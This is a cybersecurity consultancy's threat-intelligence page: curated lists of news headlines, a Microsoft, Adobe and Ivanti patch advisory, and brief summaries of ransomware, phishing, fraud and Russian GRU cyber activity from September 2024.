Russia reportedly readies submarine cable 'sabotage' • The Register
Russia’s election influence efforts show sophistication, officials say - The Washington Post
Germany Accuses Russia’s GRU Military Intelligence of Cyberattacks on NATO, EU - The Moscow Times
NCSC Calls Out Cyber-Attacks From Russia's GRU (silicon.co.uk)
US charges Russian military officers for unleashing wiper malware on Ukraine | Ars Technica
US Offers $60 Million Bounty in Hunt for Russian Hackers - Newsweek
Western intelligence warns Russia targeting aid to Ukraine - Naval Technology (naval-technology.com)
‘Guerrilla projects’: Russia revels in US allegations of media warfare | Media News | Al Jazeera
Russia Trying to Sway Voters Toward Trump Using Influencers: Official - Business Insider
Russia focusing on US social media stars to covertly influence voters | Reuters
Wix to block Russian users starting September 12 (bleepingcomputer.com)
Iran
The Biggest Cyber Warfare Attacks In Global Geopolitics (informationsecuritybuzz.com)
Advisory warns of Iran ransomware threat (baselinemag.com)
The Iran cyber threat: Breaking down attack tactics | ITPro
The US is Preparing Criminal Charges in Iran Hack Targeting Trump, AP Sources Say - SecurityWeek
Significant ransom payment by major Iranian IT firm underway | SC Media (scmagazine.com)
North Korea
Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware (thehackernews.com)
Indodax hacked for $22 million, Lazarus Group suspected | Invezz
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams (thehackernews.com)
How not to hire a North Korean IT spy | CSO Online
Watch Out for This New LinkedIn Job Scam (tech.co)
Ongoing Lazarus Group campaign sets sights on blockchain pros | SC Media (scmagazine.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Commercial Spyware Use Roars Back Despite Sanctions (darkreading.com)
Predator Spyware Resurfaces: Renewed Threats And Global Implications (informationsecuritybuzz.com)
US arrests leaders of alleged Telegram terrorist group - BBC News
Bomb threats are cyber attack - News - Rádio RSI English (rtvs.sk)
Tools and Controls
AI cybersecurity needs to be as multi-layered as the system it's protecting - Help Net Security
Half of IT Leaders Faced Backup Recovery & One-Third Failed (itsecuritywire.com)
CTEM: The next frontier in cybersecurity | TechRadar
Top API risks and how to mitigate them | TechTarget
Credential Theft Protection: Defending Your Organization’s Data | MSSP Alert
Best practices for implementing the Principle of Least Privilege - Help Net Security
Inside the Secrets of Physical Penetration Testing | HackerNoon
Competition Fueled by Strong Cyber Insurance Profitability, Pricing Declines (claimsjournal.com)
6 ways hackers sidestep your two-factor authentication | PCWorld
Think rebuild, not recovery, after a supply chain attack (betanews.com)
Data centres to be given massive boost and protections from cyber criminals and IT blackouts - GOV.UK (www.gov.uk)
WordPress Mandates Two-Factor Authentication for Plugin and Theme Developers (thehackernews.com)
Cybersecurity Compliance and Beyond: How Protocols Drive Innovation and Growth - Security Boulevard
Cyber threat needs public sector response (emergingrisks.co.uk)
Cyber insurance set for explosive growth - Help Net Security
How Effective Threat Hunting Programs are Shaping Cybersecurity - Security Boulevard
8 key aspects of a mobile device security audit program | TechTarget
Why cloud security strategy is changing to prioritise recovery - Raconteur
MI6 and CIA using Gen AI to combat tech-driven threats • The Register
Other News
Cybercriminals target SMEs as large companies beef up security - The Economic Times (indiatimes.com)
Businesses' preparedness against cyber threats beginning to shrink: Beazley - Reinsurance News
The Escalating Threat of Cybercrime and the Urgent Need for Advanced Defenses (thefastmode.com)
ICO and NCA sign memorandum of understanding for further collaboration on cyber security | ICO
How to Strengthen and Improve Your Company's Security Posture - Security Boulevard
The Biggest Cybersecurity Threats Facing Small Businesses Today - DevX
Your travel guide to public Wi-Fi, security and privacy (securitybrief.co.nz)
Data centres deemed 'critical infrastructure' by government | NASDAQ:AMZN (proactiveinvestors.co.uk)
Rogue WHOIS server gives researcher superpowers no one should ever have | Ars Technica
Microsoft Office 2024 to disable ActiveX controls by default (bleepingcomputer.com)
New RAMBO attack steals data using RAM in air-gapped computers (bleepingcomputer.com)
Cyberattacks on US utilities surged 70% this year, says Check Point (yahoo.com)
The future of automotive cybersecurity: Treating vehicles as endpoints - Help Net Security
How higher ed can stay ahead of growing cyber threats - eCampus News
Cisco merch shoppers stung in CosmicSting attack • The Register
Shipping has left gates ‘wide open’ for cyber attacks | TradeWinds (tradewindsnews.com)
Vulnerability Management
Vulnerabilities
SonicWall SSLVPN access control flaw is now exploited in attacks (bleepingcomputer.com)
Cisco Patches High-Severity Vulnerabilities in Network Operating System - SecurityWeek
Veeam patches critical flaws, urges users to update (computing.co.uk)
Citrix Releases Security Updates for Citrix Workspace App for Windows | CISA
RomCom Group Exploiting Microsoft Office 0-day To Deploy Ransomware (cybersecuritynews.com)
Ivanti fixes maximum severity RCE bug in Endpoint Management software (bleepingcomputer.com)
Adobe Patches Critical, Code Execution Flaws in Multiple Products - SecurityWeek
Chrome 128 Update Resolves High-Severity Vulnerabilities - SecurityWeek
Intel Warns of 20+ Processor Vulnerabilities, Advises Firmware Updates - SecurityWeek
Adobe fixes Acrobat Reader zero-day with public PoC exploit (bleepingcomputer.com)
Palo Alto Networks Patches Dozens of Vulnerabilities - SecurityWeek
Zyxel fixes critical command injection flaw in EOL NAS devices (CVE-2024-6342) - Help Net Security
Microsoft fixes Windows Smart App Control zero-day exploited since 2018 (bleepingcomputer.com)
GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Job Execution (thehackernews.com)
Samsung’s Update Decision—Bad News Confirmed For Millions Of Galaxy Users (forbes.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 11 September 2024 – Microsoft Patch Tuesday, Adobe and Ivanti Security Updates
Black Arrow Cyber Advisory 11 September 2024 – Microsoft Patch Tuesday, Adobe and Ivanti Security Updates
Executive summary
Microsoft’s September Patch Tuesday provides updates to address 79 security issues across its product range, including four actively exploited zero-day vulnerabilities and one publicly disclosed zero-day. In addition to the Microsoft updates this week also saw Adobe fix 28 vulnerabilities across various products, and Ivanti addressing several critical severity vulnerabilities in their Endpoint Manager product, and several high severity vulnerabilities in their Workspace Control and Cloud Security Appliance products.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisations data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of Windows, Adobe and Ivanti that are products impacted. The updates should be applied as soon as possible for the actively exploited vulnerability and all other vulnerabilities that have a critical severity rating.
Microsoft
Further details on other specific updates within this Microsoft patch Tuesday can be found here:
Adobe
Further details of the vulnerabilities in Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
Ivanti
Further details of the vulnerabilities in Ivanti Cloud Service Appliance (CSA) can be found here:
Further details of the vulnerabilities in Ivanti Workspace Control (IWC) can be found here:
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Workspace-Control-IWC?language=en_US
Further details of the vulnerabilities in Ivanti Endpoint Manager (EPM) can be found here:
Need help understanding your gaps, or just want some advice? Get in touch with us.
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Briefing 06 September 2024
Black Arrow Cyber Threat Intelligence Briefing 06 September 2024:
-Active Ransomware Groups Surge by 56% in 2024
-Authorised Push Payment (APP) Fraud Dominates as Scams Hit All-Time High
-Phishing Remains Top Cyber Threat, Credential Exposure Incidents Surging
-When Cyber Security Breaches Are Inevitable, It's Time to Call for A New Approach
-Critical infrastructure Sustained 13 Cyber Attacks per Second in 2023
-How Phishing Messages Break Through Email Filters
-Can Every Business Afford to Be a Target?
-To Beat Cyber-Crime Your Business Needs a Cyber Hygiene Review
-UK Public Growing Anxious Over Dependence on IT Systems
-Russia’s Most Notorious Special Forces Unit Tied to Assassinations and Sabotage, Now Has Its Own Cyber Warfare Team
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Active Ransomware Groups Surge by 56% in 2024
There was a 56% increase in active ransomware gangs in the first half of 2024, with 73 groups in operation compared to 46 in H1 2023. This rise highlights the growing fragmentation of the ransomware landscape, partly driven by law enforcement actions that disrupted major Ransomware-as-a-Service (RaaS) groups. Notably, ransomware gang BlackCat disappeared after an “exit scam” following a ransom from US healthcare provider Change Healthcare in March 2024. Smaller groups are now emerging rapidly, executing targeted attacks, and frequently reappearing under new identities, complicating cyber security efforts.
Authorised Push Payment (APP) Fraud Dominates as Scams Hit All-Time High
The UK’s Financial Ombudsman Service reported a record high in fraud and scam cases in Q2 2024, with authorised push payment (APP) fraud making up over half of the complaints. APP fraud, where victims are tricked into transferring money to fraudsters, is contentious as many banks argue that victims made a conscious decision, thus forfeiting reimbursement. Between April and June 2024, 8,734 complaints were lodged, marking a 43% year-on-year increase. The rise is attributed not only to increased fraud but also to more complex multi-stage fraud, card payments lacking protection, and more cases being filed by professional representatives.
Phishing Remains Top Cyber Threat, Credential Exposure Incidents Surging
ReliaQuest’s Q3 2024 Attacker Trends Analysis reveals that phishing remains the top cyber threat, accounting for 37% of incidents. However, credential exposure incidents have surged dramatically to 88% of security alerts, up from 60% in 2023, indicating a critical weakness in credential management. Malware, particularly the Remote Access Trojan (RAT) "SocGholish", affected 23% of customers, often linked to phishing campaigns. Additionally, MITRE ATT&CK techniques such as T1078 (Valid Accounts) and T1204 (User Execution) were frequently exploited, highlighting the need for stronger credential protection and phishing defences.
When Cyber Security Breaches Are Inevitable, It's Time to Call for A New Approach
At a recent TED Conference discussions highlighted how emerging technologies like AI and quantum computing are poised to both elevate and challenge cyber security. Research from Proofpoint shows that 94% of cloud customers were targeted monthly in 2023, with 62% successfully compromised, underscoring the increased risk. To counter this, businesses must adopt a cyber resilience mindset, focusing on sustaining operations during and after a cyber attack. This involves planning, regular practice, early detection, and partnerships to ensure organisations remain resilient amid growing cyber threats.
Critical infrastructure Sustained 13 Cyber Attacks per Second in 2023
Critical infrastructure faced over 420 million cyber attacks between January 2023 and January 2024, marking a 30% rise from the previous year. Power grids, transportation, and communication networks are particularly vulnerable due to the severe disruption any failures would cause. The US, UK, Germany, India, and Japan were the most frequently targeted, with threat actors predominantly originating from China, Russia, and Iran. The increasing digitisation of global infrastructure has heightened the risk of cyber attacks, particularly following the onset of the war in Ukraine.
How Phishing Messages Break Through Email Filters
The APWG’s Phishing Activity Trends Report for Q1 2024 revealed over 963,000 phishing attacks, with Business Email Compromise (BEC) fraud seeing a 50% rise in the average wire transfer request to $84,000. Cyber security researchers at LevelBlue Labs detailed sophisticated evasion techniques used by attackers, including voice phishing (vishing), exploiting compromised accounts, and leveraging social engineering. Attackers bypass email security gateways (SEGs) by using advanced tactics such as manipulating ZIP archives and reversing text in email source code, enabling them to distribute malware undetected. These developments highlight the urgent need for enhanced anti-phishing measures and user vigilance.
Can Every Business Afford to Be a Target?
Small and medium-sized businesses (SMBs) face an evolving cyber threat landscape, as cyber criminals increasingly adopt business models like Ransomware-as-a-Service (RaaS). According to recent findings, SMBs are particularly vulnerable due to limited financial and staffing resources, leaving them exposed to phishing attacks, leaked data, and common technology vulnerabilities. Ransomware groups provide tools to less skilled attackers, expanding the scope of attacks. Phishing remains a significant threat, especially as SMBs rely on SaaS applications. To protect themselves, SMBs must find cost-effective solutions, such as automated threat monitoring and leveraging AI for threat intelligence analysis.
To Beat Cyber-Crime Your Business Needs a Cyber Hygiene Review
A recent survey revealed that 58% of large businesses experienced cyber crime in the past 12 months, costing around £5,000 per incident. With human error responsible for 95% of cyber security breaches, a focus on cyber hygiene is critical. Organisations should conduct a ‘cyber-hygiene deep clean,’ which includes documenting all hardware, software, and applications, and updating or uninstalling outdated or unused systems. Regular password updates, software patches, and thorough vulnerability assessments of public-facing assets are essential to prevent breaches. Protecting customer data, especially PII, must be prioritised to avoid compliance issues and fines.
UK Public Growing Anxious Over Dependence on IT Systems
A recent survey by OnePoll for the International Cyber Expo found that 78% of UK respondents are concerned about the heavy reliance of global organisations on IT systems and software providers. This comes after the July 2024 CrowdStrike outage, where a faulty update affected around 8.5 million computers worldwide, disabling many Windows systems. The survey revealed that 44% of respondents were impacted, with 18% directly affected and 26% knowing someone who was. The incident highlights growing apprehension over cyber security vulnerabilities and the potential for widespread disruption to everyday life and business operations.
Russia’s Most Notorious Special Forces Unit Tied to Assassinations and Sabotage, Now Has Its Own Cyber Warfare Team
A new cyber threat group, identified as Cadet Blizzard and linked to Russia’s GRU Unit 29155, has been revealed by Western government agencies. Known for its physical sabotage and assassinations, Unit 29155 has now developed a cyber warfare team responsible for multiple hacking operations targeting Ukraine, the US, and other countries. Since 2022, the group has launched attacks using Whispergate malware, which destroyed data in at least two dozen Ukrainian organisations, and engaged in defacement and data theft under the guise of a fake hacktivist group, Free Civilian. This intertwining of physical and digital tactics highlights the growing threat posed by state-sponsored cyber warfare.
Sources
https://www.infosecurity-magazine.com/news/active-ransomware-groups-surge/
https://www.infosecurity-magazine.com/news/app-fraud-scams-alltime-high/
https://informationsecuritybuzz.com/phishing-top-cyber-threat-despite-drop/
https://www.techradar.com/pro/critical-infrastructure-sustained-13-cyber-attacks-per-second-in-2023
https://cybersecuritynews.com/phishing-email-filter-breakthroughs/
https://informationsecuritybuzz.com/can-every-business-afford-to-be-target/
https://itbrief.co.uk/story/uk-public-growing-anxious-over-dependence-on-it-systems
https://www.wired.com/story/russia-gru-unit-29155-hacker-team/
Governance, Risk and Compliance
To beat cyber-crime your business needs a cyber-hygiene review - Digital Journal
More than a CISO: the rise of the dual-titled IT leader | CSO Online
Quantifying Risks to Make the Right Cyber Security Investments (inforisktoday.com)
When Cyber Security Breaches Are Inevitable, It's Time To Call For A New Approach (forbes.com)
Making Enterprises Resilient In The Face Of Growing Cyber Threats (forbes.com)
Why the CFO-CISO relationship is key to mitigating cyber risk - Raconteur
Can Every Business Afford To Be A Target? (informationsecuritybuzz.com)
The true cost of cyber crime for your business - Help Net Security
Boards Need to Take a Hard Look tt Their Cyber Vulnerabilities (forbes.com)
Incident response planning vital for cyber security (devx.com)
Surge in cyber risks will create new exposures (emergingrisks.co.uk)
Security boom is over, with third of budgets flat or falling • The Register
How Should You Manage Cyber Risk in 2024? (informationweek.com)
Cost of a data breach: Cost savings with law enforcement involvement (securityintelligence.com)
Don’t Get Your Security from Your RMM Provider: The Risks You Should Know | MSSP Alert
Insurance groups urge state support for ‘uninsurable’ cyber risks (ft.com)
Threats
Ransomware, Extortion and Destructive Attacks
RansomHub claims 210 scalps in bid for ransomware supremacy • The Register
Ransomware gangs of 2024: The rise of the affiliates (techinformed.com)
Everything you need to know about RansomHub, the new force in the digital extortion industry | ITPro
New ransomware group is hitting VMware ESXi systems hard | TechRadar
Active Ransomware Groups Surge by 56% in 2024 - Infosecurity Magazine (infosecurity-magazine.com)
Global Ransomware Attacks Spiked Along with Payments and Demands in Q2: Corvus (claimsjournal.com)
Ransomware tactics 2024: why you need to protect yourself differently | TechFinitive
How ransomware tactics are shifting, and what it means for your business - Help Net Security
Why Are Organisations Losing the Ransomware Battle? | Axio
IT worker charged over $750,000 cyber extortion plot against former employer (bitdefender.com)
Qilin Ransomware Attack Used To Steal Chrome Browser Data - Security Boulevard
RansomHub Emerges in Rapidly Evolving Ransomware Landscape - Security Boulevard
Fog ransomware crew evolving into wide-ranging threat | Computer Weekly
Cicada Ransomware - What You Need To Know | Tripwire
83% of organisations experienced at least one ransomware attack in the last year - Help Net Security
Researcher sued for sharing data stolen by ransomware with media (bleepingcomputer.com)
Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems (bleepingcomputer.com)
Ransomware Gangs Pummel Southeast Asia (darkreading.com)
Linux Ransomware Threats: How Attackers Target Linux Systems (itprotoday.com)
Ransomware Victims
Housing charity latest to get hit by ransomware attack - TFN
City of Columbus Sues Researcher Who Disclosed Impact of Ransomware Attack - SecurityWeek
Tewkesbury Borough Council cyber attack sparks disruption - BBC News
Halliburton confirms data was stolen in ongoing cyber attack | TechCrunch
‘Critical’ cyber attack on pension fund ‘almost certain’ - Somerset Live
Lockbit claims breach on Canada’s largest school board: Is the group back with a vengeance? | ITPro
Planned Parenthood confirms cyber attack as RansomHub claims breach (bleepingcomputer.com)
Phishing & Email Based Attacks
How Phishing Messages Break Through Email Filters - Report (cybersecuritynews.com)
Phishing Remains Top Cyber Threat (informationsecuritybuzz.com)
File-sharing phishing attacks zero-in on the financial sector | SC Media (scmagazine.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
Help friends and family avoid phishing emails (appleinsider.com)
Novel attack on Windows spotted in Chinese phishing campaign • The Register
Travelers Beware of Sophisticated Booking.com Phishing Attack (cybersecuritynews.com)
Business Email Compromise (BEC)
Nigerian man sentenced to 5 years for role in BEC operation | CyberScoop
Two Nigerians Sentenced to Prison in US for BEC Fraud - SecurityWeek
Other Social Engineering
How Phishing Messages Break Through Email Filters - Report (cybersecuritynews.com)
APP Fraud Dominates as Scams Hit All-Time High - Infosecurity Magazine (infosecurity-magazine.com)
Stop Scanning Random QR Codes (gizmodo.com)
Quishing, an insidious threat to electric car owners (securityaffairs.com)
VIEW: Deepfakes represent growing cyber threat - CIR Magazine
The attack with many names: SMS Toll Fraud - Help Net Security
FBI warns crypto firms of aggressive social engineering attacks (bleepingcomputer.com)
Travelers Beware of Sophisticated Booking.com Phishing Attack (cybersecuritynews.com)
Cryptohack Roundup: Focus on Pig Butchering - DataBreachToday
Recruiters and job candidates need to be vigilant of emerging cyber crime (thehrdirector.com)
North Korean Hackers Targets Job Seekers with Fake FreeConference App (thehackernews.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
Artificial Intelligence
The six most dangerous new threats security teams need to know about - IT Security Guru
AI-enhanced cyber attack tops emerging enterprise risk rankings – Gartner - CIR Magazine
AI as an Insider Threat | AFCEA International
87% of executives are concerned about bot attacks and AI fraud | Security Magazine
Deepfakes represent growing cyber threat - CIR Magazine
Gen reveals 46% surge in cyber attacks; AI scams grow rapidly (securitybrief.co.nz)
Think hard before deploying Copilot for Microsoft 365 • The Register
Businesses still ready to invest in Gen AI, with risk management a top priority | ZDNET
Clearview AI fined $33 million for facial recognition database | TechRadar
There are many reasons why companies struggle to exploit generative AI, says Deloitte survey | ZDNET
1 in 3 workers are using AI multiple times a week - and they're shouting about it | ZDNET
Inside NSA's partnerships with AI makers to prevent future attacks - Washington Times
Is AI the new bloatware? | ZDNET
AI, cyber and critical infrastructure | Professional Security
Governments need to beef up cyberdefence for the AI era - and get back to the basics | ZDNET
2FA/MFA
The six most dangerous new threats security teams need to know about - IT Security Guru
How Hackers Bypass MFA, And What You Can Do About It (forbes.com)
Admins of MFA bypass service plead guilty to fraud (bleepingcomputer.com)
UK trio pleads guilty to operating $10M MFA bypass biz • The Register
Malware
'Voldemort' Malware Curses Orgs Using Global Tax Authorities (darkreading.com)
This malware pretends to be a real VPN service to lure in victims | TechRadar
GitHub comments abused to spread Lumma Stealer malware as fake fixes (bleepingcomputer.com)
Godzilla Fileless Backdoor Exploits Atlassian Confluence Vulnerability (cybersecuritynews.com)
3,000 "ghost accounts" on GitHub spreading malware (securityintelligence.com)
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore (thehackernews.com)
New Golang malware capable of cross-platform backdoor attacks spotted in the wild | TechRadar
What is malvertising? Cyber criminals exploiting search ads to spread malware | Invezz
China's 'Earth Lusca' Propagates Multiplatform Backdoor (darkreading.com)
Microsoft Observed A New Tickler Malware Attack Satellite Devices (cybersecuritynews.com)
Chinese organisations are being hit by Cobalt Strike malware from within China | TechRadar
New Backdoor Used By Iranian State-Sponsored Group | Decipher (duo.com)
Thousands of abandoned PyPI projects could be hijacked: Report | CSO Online
Fake OnlyFans cyber crime tool infects hackers with malware (bleepingcomputer.com)
Numerous malware deployed in prolonged APT32 intrusion | SC Media (scmagazine.com)
Mobile
Android And iOS Users Attacked By Russian APT29 Hackers, Google Warns (forbes.com)
This Popular App Company Was Sold, and Now Its Android Apps Are a Privacy Risk (makeuseof.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
Denial of Service/DoS/DDOS
Massive DDoS poured 3.15 billion packets per second on Microsoft server | Cybernews
Only 25% of organisations are prepared to manage a DDoS attack | Security Magazine
Internet of Things – IoT
Attacks Continue on Connected Devices - Electrical Contractor Magazine (ecmag.com)
A Deep Dive Into IoT Communication Protocols (informationsecuritybuzz.com)
CCTV biz Verkada pays $3M to settle FTC complaint • The Register
Data Breaches/Leaks
170 million strong data leak traced to US data broker | TechRadar
Over 1.4M Users Exposed in Tracelo Breach | MSSP Alert
Microchip Technology confirms data was stolen in cyber attack (bleepingcomputer.com)
Organised Crime & Criminal Actors
Philippine authorities detain more than 160 people over suspected cyber crime operation - Bloomberg
Admins of MFA bypass service plead guilty to fraud (bleepingcomputer.com)
CEO's Arrest Likely Won't Dampen Cyber criminal Interest in Telegram (darkreading.com)
Alleged cyber criminal wanted by US spent 15 years evading arrest (voanews.com)
The true cost of cyber crime for your business - Help Net Security
UK trio pleads guilty to operating $10M MFA bypass biz • The Register
Cyber criminals use legitimate software for attacks increasing (securitybrief.co.nz)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Microsoft Says North Korean Cryptocurrency Thieves Behind Chrome Zero-Day - SecurityWeek
FTC: Over $110 million lost to Bitcoin ATM scams in 2023 (bleepingcomputer.com)
FBI warns crypto firms of aggressive social engineering attacks (bleepingcomputer.com)
North Korean scammers prep stealth attacks on crypto outfits • The Register
Cryptohack Roundup: Focus on Pig Butchering - DataBreachToday
Insider Risk and Insider Threats
How Employees Can Protect a Company's Cyber Security - DevX
IT worker charged over $750,000 cyber extortion plot against former employer (bitdefender.com)
INSIDER THREAT AWARENESS MONTH: Are you prepared? - IT Security Guru
Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities (thehackernews.com)
Human firewalls are essential to keeping SaaS environments safe - Help Net Security
AI as an Insider Threat | AFCEA International
Insurance
Insurance groups urge state support for ‘uninsurable’ cyber risks (ft.com)
Supply Chain and Third Parties
UK Public Worried About Global Over Reliance on IT Systems - IT Security Guru
Improved Software Supply Chain Resilience Equals Increased Security (darkreading.com)
What is Vendor Risk Monitoring in Cyber Security? | UpGuard
Top 8 Vendor Risk Monitoring Solutions in 2024 | UpGuard
Boards Need To Take A Hard Look At Their Cyber Vulnerabilities (forbes.com)
Cloud/SaaS
A third of organisations suffered a SaaS data breach this year - Help Net Security
File-sharing phishing attacks zero-in on the financial sector | SC Media (scmagazine.com)
How Confident Are You That Your Critical Saas Applications Are Secure? (thehackernews.com)
Human firewalls are essential to keeping SaaS environments safe - Help Net Security
What Is the Shared Fate Model? (darkreading.com)
Rising cloud costs leave CIOs seeking ways to cope | CIO
Outages
UK public growing anxious over dependence on IT systems (itbrief.co.uk)
We must break tech monopolies before they break us (thenextweb.com)
Boards Need To Take A Hard Look At Their Cyber Vulnerabilities (forbes.com)
Identity and Access Management
Why Identity Teams Need to Start Reporting to the CISO (darkreading.com)
The Evolution of Identity and Access Management (IAM) - Security Boulevard
Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities (thehackernews.com)
Linux and Open Source
Linux Ransomware Threats: How Attackers Target Linux Systems (itprotoday.com)
Passwords, Credential Stuffing & Brute Force Attacks
Why You Shouldn't Store Passwords in Your Browser: Password Security Risks | HackerNoon
The New Effective Way to Prevent Account Takeovers (thehackernews.com)
Social Media
Russian minister: Telegram 'too free' on content moderation • The Register
Hacker Leaks Data of 390 Million Users from VK, a Russian Social Network (hackread.com)
Germany’s Far Right Is in a Panic Over Telegram | WIRED
Fake OnlyFans cyber crime tool infects hackers with malware (bleepingcomputer.com)
Malvertising
In plain sight: Malicious ads hiding in search results (welivesecurity.com)
What is malvertising? Cyber criminals exploiting search ads to spread malware | Invezz
Your Google searches becoming big target for 'malvertising' hackers (cnbc.com)
Malvertising is popping up on search engines - The Hustle
Regulations, Fines and Legislation
Clearview AI fined $33 million for facial recognition database | TechRadar
UK Signs Council of Europe AI Convention - Infosecurity Magazine (infosecurity-magazine.com)
CCTV biz Verkada pays $3M to settle FTC complaint • The Register
Models, Frameworks and Standards
6 IT risk assessment frameworks compared | CSO Online
Banks Brace for DORA Cyber Security Deadline on Jan. 17 (inforisktoday.com)
NIST Cybersecurity Framework (CSF) and CTEM – Better Together (thehackernews.com)
Complying with PCI DSS requirements by 2025 - Help Net Security
Explaining The OWASP API Security Top 10 (informationsecuritybuzz.com)
NIST Obtains OpenAI, Anthropic AI Model Access | MSSP Alert
Making Sense of Cyber Security Standards Like FedRAMP (pymnts.com)
Careers, Working in Cyber and Information Security
Championing the Wins to Improve Wellbeing in the Cyber Workplace - IT Security Guru
Biden admin calls infosec 'national service' in job-fill bid • The Register
Are IT certifications replacing the college degree? | CIO
Law Enforcement Action and Take Downs
Philippine authorities detain more than 160 people over suspected cyber crime operation - Bloomberg
IT worker charged over $750,000 cyber extortion plot against former employer (bitdefender.com)
Admins of MFA bypass service plead guilty to fraud (bleepingcomputer.com)
CEO's Arrest Likely Won't Dampen Cyber criminal Interest in Telegram (darkreading.com)
Nigerian man sentenced to 5 years for role in BEC operation | CyberScoop
Alleged cyber criminal wanted by US spent 15 years evading arrest (voanews.com)
UK trio pleads guilty to operating $10M MFA bypass biz • The Register
Two Nigerians Sentenced to Prison in US for BEC Fraud - SecurityWeek
Cost of a data breach: Cost savings with law enforcement involvement (securityintelligence.com)
Misinformation, Disinformation and Propaganda
Justice Department accuses Russia of interfering with 2024 elections | CyberScoop
US charges Russian GRU hacking team behind WhisperGate • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Nation State Actors
China
China's 'Earth Lusca' Propagates Multiplatform Backdoor (darkreading.com)
Chinese organisations are being hit by Cobalt Strike malware from within China | TechRadar
Novel attack on Windows spotted in Chinese phishing campaign • The Register
Russia
NCSC and allies call out Russia's Unit 29155 over cyber warfare | Computer Weekly
Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage - SecurityWeek
Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare Team | WIRED
Android And iOS Users Attacked By Russian APT29 Hackers, Google Warns (forbes.com)
Justice Department accuses Russia of interfering with 2024 elections | CyberScoop
Sweden warns of heightened risk of Russian sabotage | Sweden | The Guardian
Russian military intelligence organised cyber attacks against Estonian institutions | News | ERR
US charges Russian GRU hacking team behind WhisperGate • The Register
The FCC has finally banned Kaspersky from telecoms kits | TechRadar
Iran
Israeli spies targeted by Iranian hackers | SC Media (scmagazine.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
New Backdoor Used By Iranian State-Sponsored Group | Decipher (duo.com)
North Korea
North Korean scammers prep stealth attacks on crypto outfits • The Register
North Korean Hackers Targets Job Seekers with Fake FreeConference App (thehackernews.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Numerous malware deployed in prolonged APT32 intrusion | SC Media (scmagazine.com)
Civil Rights Groups Call For Spyware Controls - Infosecurity Magazine (infosecurity-magazine.com)
Germany’s Far Right Is in a Panic Over Telegram | WIRED
Hacker Leaks Data of 390 Million Users from VK, a Russian Social Network (hackread.com)
Spyware vendors thwart restrictions by changing names, reorganise, move - The Washington Post
Predator spyware resurfaces with signs of activity, Recorded Future says | CyberScoop
Civil Rights Groups Call For Spyware Controls - Infosecurity Magazine (infosecurity-magazine.com)
Tools and Controls
To beat cyber-crime your business needs a cyber-hygiene review - Digital Journal
Evolution of Attack Surface Management - Security Boulevard
This malware pretends to be a real VPN service to lure in victims | TechRadar
API Attack Surface: How to secure it and why it matters - Security Boulevard
Why enterprises need real-time visibility of their invisible threats (betanews.com)
Quantifying Risks to Make the Right Cyber Security Investments (inforisktoday.com)
When Cyber Security Breaches Are Inevitable, It's Time To Call For A New Approach (forbes.com)
Making Enterprises Resilient In The Face Of Growing Cyber Threats (forbes.com)
Why the CFO-CISO relationship is key to mitigating cyber risk - Raconteur
Choosing the Best Cyber Security Prioritization Method for Your Organisation - Security Boulevard
What is Vendor Risk Monitoring in Cyber Security? | UpGuard
Is the "Network" Defendable? - Security Boulevard
How Confident Are You That Your Critical SaaS Applications Are Secure? (thehackernews.com)
The Evolution of Identity and Access Management (IAM) - Security Boulevard
NIST Cybersecurity Framework (CSF) and CTEM – Better Together (thehackernews.com)
Explaining The OWASP API Security Top 10 (informationsecuritybuzz.com)
Incident response planning vital for cyber security (devx.com)
Rising cloud costs leave CIOs seeking ways to cope | CIO
Think hard before deploying Copilot for Microsoft 365 • The Register
Use AI threat modeling to mitigate emerging attacks | TechTarget
Don’t Get Your Security from Your RMM Provider: The Risks You Should Know | MSSP Alert
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore (thehackernews.com)
